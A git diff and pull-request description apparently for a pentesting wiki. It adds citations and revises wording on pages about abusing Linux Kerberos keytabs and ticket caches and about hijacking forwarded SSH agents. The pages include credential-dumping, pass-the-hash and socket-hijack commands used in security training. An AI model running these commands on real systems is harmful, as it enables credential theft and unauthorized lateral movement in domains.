+The extractor prints raw Kerberos JSON payloads; convert them into a usable ticket cache or another ticket format before pass-the-cache/pass-the-ticket operations.<sup>[[4]](#references)</sup>
 
 ### Quick keytab triage
 
@@ -125,41 +123,41 @@ klist
 
 ### Extract accounts from /etc/krb5.keytab
 
-Service account keys, essential for services operating with root privileges, are securely stored in **`/etc/krb5.keytab`** files. These keys, akin to passwords for services, demand strict confidentiality.
+Service account keys, essential for services operating with root privileges, are securely stored in **`/etc/krb5.keytab`** files. These keys, akin to passwords for services, demand strict confidentiality.<sup>[[5]](#references)</sup>
 
-To inspect the keytab file's contents, **`klist`** can be employed. On Linux, `klist -k -K -e` prints the principals, key version numbers, encryption types, and raw key material. If the key type is **23 / RC4-HMAC**, the key value is also the **NT hash** of that principal.
+To inspect the keytab file's contents, **`klist`** can be employed. On Linux, `klist -k -K -e` prints the principals, key version numbers, encryption types, and raw key material. If the key type is **23 / RC4-HMAC**, the key value is also the **NT hash** of that principal.<sup>[[6]](#references)[[17]](#references)</sup>
 
 ```bash
 klist -k -K -e /etc/krb5.keytab
 # RC4-HMAC entries expose reusable NTLM material; AES entries do not
 ```
 
-For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse. Note that this only helps when the keytab still contains **etype 23 / RC4-HMAC** material. In **AES-only** environments you may not get a reusable NT hash, but you can still authenticate directly with the keytab via Kerberos.
+For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse. Note that this only helps when the keytab still contains **etype 23 / RC4-HMAC** material. In **AES-only** environments you may not get a reusable NT hash, but you can still authenticate directly with the keytab via Kerberos.<sup>[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 python3 keytabextract.py krb5.keytab
 # Expected output varies based on hash availability
 ```
 
-On macOS, **`bifrost`** serves as a tool for keytab file analysis.
+On macOS, **`bifrost`** serves as a tool for keytab file analysis.<sup>[[8]](#references)</sup>
 
 ```bash
 ./bifrost -action dump -source keytab -path /path/to/your/file
 ```
 
-Utilizing the extracted account and hash information, connections to servers can be established using tools like **`NetExec`**.
+Utilizing the extracted account and hash information, connections to servers can be established using tools like **`NetExec`**.<sup>[[9]](#references)</sup>
 
 ```bash
 # NTLM/RC4 material recovered from etype 23 entries
 nxc smb 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN"
 
 # Or reuse a Kerberos cache directly
-KRB5CCNAME=owned.ccache netexec smb <DC_FQDN> --use-kcache
+KRB5CCNAME=owned.ccache nxc smb <DC_FQDN> --use-kcache
 ```
 
 ### Reuse the machine account from `/etc/krb5.keytab`
 
-On `realmd`/`adcli`/`sssd` joined systems, `/etc/krb5.keytab` usually contains the **computer account** and one or more **host/service principals**. If you have **root**, don't just dump it: use one of the principals listed by `klist -k` to request a TGT and operate as the Linux host itself.
+On `realmd`/`adcli`/`sssd` joined systems, `/etc/krb5.keytab` usually contains the **computer account** and one or more **host/service principals**. If you have **root**, don't just dump it: use one of the principals listed by `klist -k` to request a TGT and operate as the Linux host itself.<sup>[[10]](#references)</sup>
 
 ```bash
 # Identify usable principals first
@@ -174,11 +172,11 @@ ldapwhoami -Y GSSAPI -H ldap://dc.domain.local
 kvno ldap/dc.domain.local
 ```
 
-This is especially useful when the **computer object** itself has delegated rights in AD or when the host is allowed to retrieve other secrets such as a **gMSA**.
+This is especially useful when the **computer object** itself has delegated rights in AD or when the host is allowed to retrieve other secrets such as a **gMSA**.<sup>[[13]](#references)</sup>
 
 ### Reuse stolen Kerberos material with Linux-first AD tooling
 
-Once you have a valid `ccache` or a usable keytab, you can operate against AD **directly from Linux** without converting everything to Windows formats first. Many modern tools accept `KRB5CCNAME` / Kerberos auth natively:
+Once you have a valid `ccache` or a usable keytab, you can operate against AD **directly from Linux** without converting everything to Windows formats first. Many modern tools accept `KRB5CCNAME` / Kerberos auth natively.<sup>[[9]](#references)[[11]](#references)[[12]](#references)</sup>
 
 ```bash
 # Reuse a stolen cache with bloodyAD for LDAP-side actions
@@ -201,7 +199,7 @@ This is a good bridge between **Linux post-exploitation** and **AD object abuse*
 
 ### Linux gMSA / Managed Service Account artefacts
 
-Recent Linux deployments can consume **Managed Service Accounts** directly from AD. In practice this means that, after compromising a Linux server, you may find not only the host keytab but also **service-specific keytabs** generated from a gMSA. Common places to inspect are `/etc/gmsad.conf`, deployment-specific config files, and additional `*.keytab` files under `/etc`.<sup>[[2]](#references)</sup>
+Recent Linux deployments can consume **Managed Service Accounts** directly from AD. In practice this means that, after compromising a Linux server, you may find not only the host keytab but also **service-specific keytabs** generated from a gMSA. Common places to inspect are `/etc/gmsad.conf`, deployment-specific config files, and additional `*.keytab` files under `/etc`.<sup>[[2]](#references)[[13]](#references)</sup>
 
 ```bash
 # Look for gMSA-related configuration and extra keytabs
@@ -217,7 +215,7 @@ kinit -kt /etc/service.keytab 'svc_web$@DOMAIN.LOCAL'
 klist
 ```
 
-This gives you a reusable Kerberos identity for the SPNs bound to that gMSA **without touching any Windows endpoint**. For **domain-side** gMSA/dMSA abuse after higher privileges in AD, check:
+This gives you a reusable Kerberos identity for the SPNs bound to that gMSA **without touching any Windows endpoint**.<sup>[[13]](#references)</sup> For **domain-side** gMSA/dMSA abuse after higher privileges in AD, check:
 
 {{#ref}}
 ../../windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md
@@ -227,5 +225,20 @@ This gives you a reusable Kerberos identity for the SPNs bound to that gMSA **wi
 
 - [1] [Kerberos (II): How to attack Kerberos?](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
 - [2] [Accessing AD with a managed service account – Integrating RHEL systems directly with Active Directory](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/integrating_rhel_systems_directly_with_windows_active_directory/assembly_accessing-ad-with-a-managed-service-account_integrating-rhel-systems-directly-with-active-directory)
+- [3] [Kerberos environment variables – MIT Kerberos Documentation](https://web.mit.edu/Kerberos/krb5-latest/doc/user/user_config/kerberos.html)
+- [4] [SSSDKCMExtractor](https://github.com/mandiant/SSSDKCMExtractor)
+- [5] [keytab – MIT Kerberos Documentation](https://web.mit.edu/kerberos/krb5-latest/doc/basic/keytab_def.html)
+- [6] [RFC 4757: The RC4-HMAC Kerberos Encryption Types Used by Microsoft Windows](https://www.rfc-editor.org/rfc/rfc4757)
+- [7] [KeyTabExtract](https://github.com/sosdave/KeyTabExtract)
+- [8] [bifrost](https://github.com/its-a-feature/bifrost)
+- [9] [Using Kerberos | NetExec](https://www.netexec.wiki/getting-started/using-kerberos)
+- [10] [Discovering and Joining Identity Domains | Red Hat Enterprise Linux](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7/html/windows_integration_guide/realmd-domain)
+- [11] [bloodyAD User Guide](https://github.com/CravateRouge/bloodyAD/wiki/User-Guide)
+- [12] [pyWhisker](https://github.com/ShutdownRepo/pywhisker)
+- [13] [gmsad](https://github.com/cea-sec/gmsad)
+- [14] [About | FreeIPA documentation](https://www.freeipa.org/About.html)
+- [15] [FreeIPA 4.11.0 release notes](https://www.freeipa.org/release-notes/4-11-0.html)
+- [16] [Yama – The Linux Kernel documentation](https://docs.kernel.org/admin-guide/LSM/Yama.html)
+- [17] [klist – MIT Kerberos Documentation](https://web.mit.edu/kerberos/krb5-current/doc/user/user_commands/klist.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/user-information/ssh-forward-agent-exploitation.md
+++ b/src/linux-hardening/user-information/ssh-forward-agent-exploitation.md
@@ -1,25 +1,23 @@
 # SSH Agent Forwarding Exploitation
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ## Summary
 
-What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this:
+What can you do if the system-wide SSH client configuration (commonly `/etc/ssh/ssh_config`) or `$HOME/.ssh/config` contains the following directive?<sup>[[3]](#references)</sup>
 
 ```
 ForwardAgent yes
 ```
 
-If you are root inside the machine you can probably **access any ssh connection made by any agent** that you can find in the _/tmp_ directory<sup>[[1]](#references)</sup>
+`ForwardAgent yes` forwards the authentication agent to the remote host for matching connections. If you have root on an intermediate host where another user's agent was forwarded, you can access the forwarded Unix-domain socket and ask that agent to authenticate with its loaded identities; this can let you access hosts where those identities are authorized.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-Useful socket hunting commands:
+Useful socket hunting commands on Linux systems include (the exact socket directory depends on the client and forwarding setup):<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 ls -la /run/user/*/ssh-* /tmp/ssh-* 2>/dev/null
 find /run/user /tmp -type s -name 'agent.*' 2>/dev/null
 ```
 
-Impersonate Bob using one of Bob's ssh-agent:
+If you have access to Bob's forwarded socket, use it for an SSH connection:<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
@@ -27,18 +25,21 @@ SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
 
 ### Why does this work?
 
-When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there (normally it will be), you will be able to access any host using it.
+Setting `SSH_AUTH_SOCK` points the SSH client at a Unix-domain socket for the agent; it does not load Bob's private-key file. The agent performs private-key operations itself and returns the result, rather than sending private-key material to the client or over the network.<sup>[[1]](#references)[[2]](#references)</sup>
 
-As the private key is saved in the memory of the agent uncrypted, I suppose that if you are Bob but you don't know the password of the private key, you can still access the agent and use it.
+If Bob has already loaded a key into the agent and that key is authorized on another host, anyone who can use the socket can ask the agent to authenticate there as Bob without knowing the key's passphrase at request time; confirmation and destination constraints may still limit the request.<sup>[[1]](#references)[[2]](#references)[[4]](#references)</sup>
 
-Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key.
+Access to the socket is normally enough; extracting key material from the agent process is unnecessary and is not part of the agent protocol. The owning user or root may be able to bypass socket permissions, so protect hosts receiving forwarded agents accordingly.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ## Long explanation and exploitation
 
-**Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)**<sup>[[1]](#references)</sup>
+**Read [Clockwork's original research](https://www.clockwork.com/insights/ssh-agent-hijacking/)**.<sup>[[1]](#references)</sup>
 
 ## References
 
 - [1] [SSH Agent Hijacking](https://www.clockwork.com/insights/ssh-agent-hijacking/)
+- [2] [ssh-agent(1)](https://man.openbsd.org/ssh-agent.1)
+- [3] [ssh_config(5)](https://man.openbsd.org/ssh_config.5)
+- [4] [ssh-add(1)](https://man.openbsd.org/ssh-add.1)
 
 {{#include ../../banners/hacktricks-training.md}}


### PR DESCRIPTION
## Summary
- review the current 50-page local reference batch
- cite every numbered reference and remove repeated in-page content
- preserve and reconcile the latest upstream ld.so.conf research

## Validation
- reference numbering/coverage audit: clean across all 50 pages
- duplicate prose/command audit: clean
- `git diff --check`: clean
- 422 unique new/changed reference URLs checked
- `mdbook build`: blocked locally because the configured `mdbook-tabs` preprocessor is not installed